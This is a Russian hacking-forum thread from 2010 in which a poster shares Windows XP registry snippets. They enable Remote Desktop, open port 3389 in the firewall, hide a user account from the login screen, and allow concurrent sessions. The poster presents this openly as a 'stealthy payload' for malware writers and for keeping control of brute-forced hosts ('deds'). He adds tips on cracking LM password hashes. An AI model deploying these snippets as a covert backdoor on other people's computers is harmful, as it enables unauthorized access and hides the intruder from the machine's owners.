Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
Разрешить удаленный доступ к компьютеру (через реестр) |
07.03.2010, 16:49
|
|
Moderator - Level 7
Регистрация: 02.05.2009
Сообщений: 894
Провел на форуме:
4297091
Репутация:
2261
|
|
Разрешить удаленный доступ к компьютеру (через реестр)
нужно было себе, хотел было спросить тут готовое - но пошел по другому пути - разобраться самому и рассказать другим.
Включаем
"Разрешить удаленный доступ к этому компьютеру" через реестр:
Код:
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]
"fDenyTSConnections"=dword:00000000
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\DomainProfile\GloballyOpenPorts\List]
"3389:TCP"="3389:TCP:*:Enabled:@xpsp2res.dll,-22009"
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List]
"3389:TCP"="3389:TCP:*:Enabled:@xpsp2res.dll,-22009"
Выключаем:
Код:
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]
"fDenyTSConnections"=dword:00000001
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\DomainProfile\GloballyOpenPorts\List]
"3389:TCP"="3389:TCP:*:Disabled:@xpsp2res.dll,-22009"
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List]
"3389:TCP"="3389:TCP:*:Disabled:@xpsp2res.dll,-22009"
Bonus: (инфа паблик, но если вам пригодилась первая часть этой темы - может пригодиться и бонус)
делаем любую учетку невидимой через "Паналь управления - Учетные записи пользователей"
Код:
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList]
"hidden_account"=dword:00000000
где hidden_account - имя учетки.
Примечание: учетка будет невидна только через "Учетные записи пользователей" (Win XP) а так же в меню выбора пользователя при запуске системы. Через "net user", "lusrmgr.msc" и прочие аналогичные админские управлялки её по-прежнему видно.
Сабж удачно подходит как лишняя безпалевная полезная нагрузка для вашего софта по управлению собственным компьютером в учебных целях
ps. если хоитие поставить на учетку пасс, который не смогут снять за 10-15 минут - ставьте минимально 15 символов.
В винде по дефолту пассы учеток хранятся и в виде LM и в NT хэшей, при этом большинство LM хэшей ломается на GPU в течение получаса. За 2 суток же - вообще любой, не зависимо от сложности пасса. НО - для пассов, длиннее 14 символов LM хэши не сохраняются - только NT. Подобрать же (15 символьный) NT хэш, если пасс минимально сложен для своей длинны и не словарный - невозможно.
Почему я это говорю? Если на всех своих дедах вы зафигачите одну и ту же учетку с 1 и тем же пассом, и кто-то их других брутеров вдруг запалит эту учетку - он может тупо пробрутить диапазон по ней (я сам так делал  ), и снять все ваши деды. Как защиту от этого - юзайте 15-симв. пассы
[update] Полный и рабочий код программы см. ниже в посте #12[/update]
Последний раз редактировалось ErrorNeo; 08.03.2010 в 02:12..
|
|
|
07.03.2010, 16:57
|
|
Banned
Регистрация: 04.03.2010
Сообщений: 1
Провел на форуме:
7768
Репутация:
0
|
|
С удовольствием поставил бы + , но немогу =( маловат ещё
|
|
|
|
07.03.2010, 17:10
|
|
Moderator - Level 7
Регистрация: 12.07.2008
Сообщений: 1,705
Провел на форуме:
5914048
Репутация:
1350
|
|
А в чем разбор то состоит,что было все было описанно от 2001 года? Про хэши так это времен 93 года =)
|
|
|
|
07.03.2010, 17:14
|
|
Moderator - Level 7
Регистрация: 02.05.2009
Сообщений: 894
Провел на форуме:
4297091
Репутация:
2261
|
|
я заюзал гугл и не нашел, как включать эту опцию через реестр.
дальше промониторил реестр при включении\выключении этой опции, нашел нужные ключи - протестировал и запостил тут.
Думаю если этого не знал я, то не знают и многие другие начинающие писатели малвар-софта. И теперь гугл - когда они его спросят - таки даст им ответ  |
|
|
|
07.03.2010, 17:15
|
|
Moderator - Level 7
Регистрация: 12.07.2008
Сообщений: 1,705
Провел на форуме:
5914048
Репутация:
1350
|
|
Сообщение от ErrorNeo
я заюзал гугл и не нашел, как включать эту опцию через реестр.
дальше промониторил реестр при включении\выключении этой опции, нашел нужные ключи - протестировал и запостил тут.
Думаю если этого не знал я, то не знают и многие другие начинающие писатели малвар-софта. И теперь гугл - когда они его спросят - таки даст им ответ Плохо искали, http://technet.microsoft.com/en-us/library/cc778860(WS.10).aspx
|
|
|
|
07.03.2010, 17:22
|
|
Moderator - Level 7
Регистрация: 02.05.2009
Сообщений: 894
Провел на форуме:
4297091
Репутация:
2261
|
|
я понимаю желание показать высокий уровень компьютерной грамотности, но
не зная того, какой именно ключ отвечает за Разрешение удаленного доступа слабо найти эту страницу?
Вообще-то там весь реестр расписан - если знаешь имена нужных ключей. А если не знаешь названий - то либо нужно несколько месяцев читать их все (интересно есть ли те, кто прочил их все), либо обломаться.
upd.
вообще да, пожалуй можно - если юзать поиск по сайту и писать все по английски. Но тем не менее проще - просто спросить гугл. Ну а на втором месте - протрассировать самому 
да и вообще возможно кому-то понравится сама идея добавлять такую нагрузку в свой софт - просто и изящно...
upd2.
в добавок юзер, который нашел таки эту страницу заюзав знания английского и знание названий обпций в Англ. версии винды должен еще и не забыть открыть доступ к порту в виндовом фаере (а о необходимости этого на мелкософте не сказано). Конечно же, если юзер достаточно грамотен - он догадается.... возможно.
Но опять же - не проще ли
1. спросить гугл и найти такую статью как эта и не *ть себе мозг
2. протрассировать, чтобы не думать - "не забыл ли я чего" и "блин, почему оно не работает"
Последний раз редактировалось ErrorNeo; 07.03.2010 в 17:30..
|
|
|
|
07.03.2010, 17:27
|
|
Moderator - Level 7
Регистрация: 12.07.2008
Сообщений: 1,705
Провел на форуме:
5914048
Репутация:
1350
|
|
Сообщение от ErrorNeo
я понимаю желание показать высокий уровень компьютерной грамотности, но
не зная того, какой именно ключ отвечает за Разрешение удаленного доступа слабо найти эту страницу?
Вообще-то там весь реестр расписан - если знаешь имена нужных ключей. А если не знаешь названий - то либо нужно несколько месяцев читать их все (интересно есть ли те, кто прочил их все), либо обломаться. По удивлению введя в гугле Enable remote desktop registry ,получаем огромное колличество ссылок и опять же сайт производителя:
http://technet.microsoft.com/en-us/library/cc782195(WS.10).aspx
И сайт одного из MVP даже в картинках показано:
http://oreilly.com/windows/archive/server-hacks-remote-desktop.html
|
|
|
|
07.03.2010, 17:34
|
|
Moderator - Level 7
Регистрация: 02.05.2009
Сообщений: 894
Провел на форуме:
4297091
Репутация:
2261
|
|
я проапдейтил предыдущий пост.
Ну сделал ты это, ну не пашет оно, и чо? На сайте мелкософта написано, что нужно добавлять порт в исключения фаера? И какое количество времени начинающий писатель малвари будет догонять, чо не пашет?
Теория есть теория. Кроме того всё, что ты - спренгл - нашел - на английском. Любой кодер просто обязан знать английский в достаточной степени для того, чтобы свободно читать сайт майкрософта и иностранные блоги, да?
Все, кто свободно не знает английского, не имеет на машине анлглоязычной версии венды и потому не знает точных названий опций в ней (на англ) + не достаточно екстрасансорен, чтобы понимать, что включив службу, конечно же, нужно не забыть открыть и порт - все они - школота, которой и не нужно писать таких вещей, чтобы не засорять интернет. ?
Я так не считаю. пусть себе пишут)
update:
по запросам "разрешить удаленный доступ к компьютеру" и "разрешить удаленный доступ к компьютеру через реестр" в ру-нете есть только 1 тема с описанием того, как это сделать не "мышкой через меню". эта.
и да будет так
Последний раз редактировалось ErrorNeo; 07.03.2010 в 17:51..
|
|
|
|
07.03.2010, 17:49
|
|
Reservists Of Antichat - Level 6
Регистрация: 05.03.2007
Сообщений: 1,985
Провел на форуме:
3288241
Репутация:
3349
|
|
Ну так тут дело всё даже не в реестре. Удаленный доступ осуществляется загрузкой сервиса который это делает и разрешение коннекта.
ВОт тут вот и кроется вся хря. В твоем случае ты просто разрешаешь коннекты, но не запускаешь сервис. Частенько телнет отрублен.
|
|
|
|
07.03.2010, 17:52
|
|
Moderator - Level 7
Регистрация: 02.05.2009
Сообщений: 894
Провел на форуме:
4297091
Репутация:
2261
|
|
да...
я думал об этом, но не запостил тут. Есть там какой-то ключ и для этого. Допишу и запуск службы
upd
Код:
Microsoft Windows XP [Версия 5.1.2600]
(С) Корпорация Майкрософт, 1985-2001.
C:\Documents and Settings\Admin>net start telnet
Системная ошибка 1058.
Указанная служба не может быть запущена, поскольку она отключена или все связанн
ые с ней устройства отключены.
только что запускал на деде, управляя им через RDP. Там как-то по другому вроде. Щас поищу
upd2. нашел (прогуглив ключ) на http://forum.hackzona.ru/forum-f16/aaee-t17123.html
("Активация удаленного доступа на Bat")
Код:
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Contro l\Terminal Server\Licensing Core]
"EnableConcurrentSessions"=dword:00000001
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]
"AllowMultipleTSSessions"=dword:00000001
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Curr entVersion\Group Policy\History]
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Curr entVersion\Group Policy\History\{35378EAC-683F-11D2-A89A-00C04FBBCFA2}]
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Curr entVersion\Group Policy\History\{35378EAC-683F-11D2-A89A-00C04FBBCFA2}\0]
"Options"=dword:00000000
"Version"=dword:00010001
"DSPath"="LocalGPO"
"FileSysPath"="C:\\WINNT\\System32\\GroupPolicy\\Machine"
"DisplayName"="Политика локальной группы"
"Extensions"="[{35378EAC-683F-11D2-A89A-00C04FBBCFA2}{0F6B957D-509E-11D1-A7CC-0000F87571E3}]"
"Link"="Local"
"GPOName"="Политика локальной группы"
"GPOLink"=dword:00000001
"lParam"=dword:00000000
[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Te rminal Server]
"fDenyTSConnections"=dword:00000000
"fEnableSalem"=dword:00000000
[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\ LEGACY_RDPWD]
"NextInstance"=dword:00000001
[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\ LEGACY_RDPWD\0000]
"Service"="RDPWD"
"Legacy"=dword:00000001
"ConfigFlags"=dword:00000000
"Class"="LegacyDriver"
"ClassGUID"="{8ECC055D-047F-11D1-A537-0000F8753ED1}"
"DeviceDesc"="RDPWD"
[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\ LEGACY_RDPWD\0000\Control]
"*NewlyCreated*"=dword:00000000
"ActiveService"="RDPWD"
[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\ LEGACY_TDTCP]
"NextInstance"=dword:00000001
[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\ LEGACY_TDTCP\0000]
"Service"="TDTCP"
"Legacy"=dword:00000001
"ConfigFlags"=dword:00000000
"Class"="LegacyDriver"
"ClassGUID"="{8ECC055D-047F-11D1-A537-0000F8753ED1}"
"DeviceDesc"="TDTCP"
[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\ LEGACY_TDTCP\0000\Control]
"*NewlyCreated*"=dword:00000000
"ActiveService"="TDTCP"
[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\R DPWD\Enum]
"0"="Root\\LEGACY_RDPWD\\0000"
"Count"=dword:00000001
"NextInstance"=dword:00000001
[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\S haredAccess\Parameters\FirewallPolicy\DomainProfil e\GloballyOpenPorts\List]
"3389:TCP"="3389:TCP:*:Enabled:@xpsp2res.dll,-22009"
[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\S haredAccess\Parameters\FirewallPolicy\StandardProf ile\GloballyOpenPorts\List]
"3389:TCP"="3389:TCP:*:Enabled:@xpsp2res.dll,-22009"
[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\T DTCP\Enum]
"0"="Root\\LEGACY_TDTCP\\0000"
"Count"=dword:00000001
"NextInstance"=dword:00000001
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Contro l\Terminal Server]
"fDenyTSConnections"=dword:00000000
"fEnableSalem"=dword:00000000
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\R oot\LEGACY_RDPWD]
"NextInstance"=dword:00000001
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\R oot\LEGACY_RDPWD\0000]
"Service"="RDPWD"
"Legacy"=dword:00000001
"ConfigFlags"=dword:00000000
"Class"="LegacyDriver"
"ClassGUID"="{8ECC055D-047F-11D1-A537-0000F8753ED1}"
"DeviceDesc"="RDPWD"
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\R oot\LEGACY_RDPWD\0000\Control]
"*NewlyCreated*"=dword:00000000
"ActiveService"="RDPWD"
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\R oot\LEGACY_TDTCP]
"NextInstance"=dword:00000001
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\R oot\LEGACY_TDTCP\0000]
"Service"="TDTCP"
"Legacy"=dword:00000001
"ConfigFlags"=dword:00000000
"Class"="LegacyDriver"
"ClassGUID"="{8ECC055D-047F-11D1-A537-0000F8753ED1}"
"DeviceDesc"="TDTCP"
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\R oot\LEGACY_TDTCP\0000\Control]
"*NewlyCreated*"=dword:00000000
"ActiveService"="TDTCP"
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Servic es\RDPWD\Enum]
"0"="Root\\LEGACY_RDPWD\\0000"
"Count"=dword:00000001
"NextInstance"=dword:00000001
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Servic es\SharedAccess\Parameters\FirewallPolicy\DomainPr ofile\GloballyOpenPorts\List]
"3389:TCP"="3389:TCP:*:Enabled:@xpsp2res.dll,-22009"
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Servic es\SharedAccess\Parameters\FirewallPolicy\Standard Profile\GloballyOpenPorts\List]
"3389:TCP"="3389:TCP:*:Enabled:@xpsp2res.dll,-22009"
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Servic es\TDTCP\Enum]
"0"="Root\\LEGACY_TDTCP\\0000"
"Count"=dword:00000001
"NextInstance"=dword:00000001
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserLis t]
"asdf"=dword:00000000
чета дофига ключей... надо разбираться, для чего тут половина.
upd3.
во блин... http://forum.antichat.net/showthread.php?t=36042
а ведь и правда, в XP тока один юзер по дефолту может сидеть! Надо еще и винду патчить... =\
Последний раз редактировалось ErrorNeo; 07.03.2010 в 18:17..
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
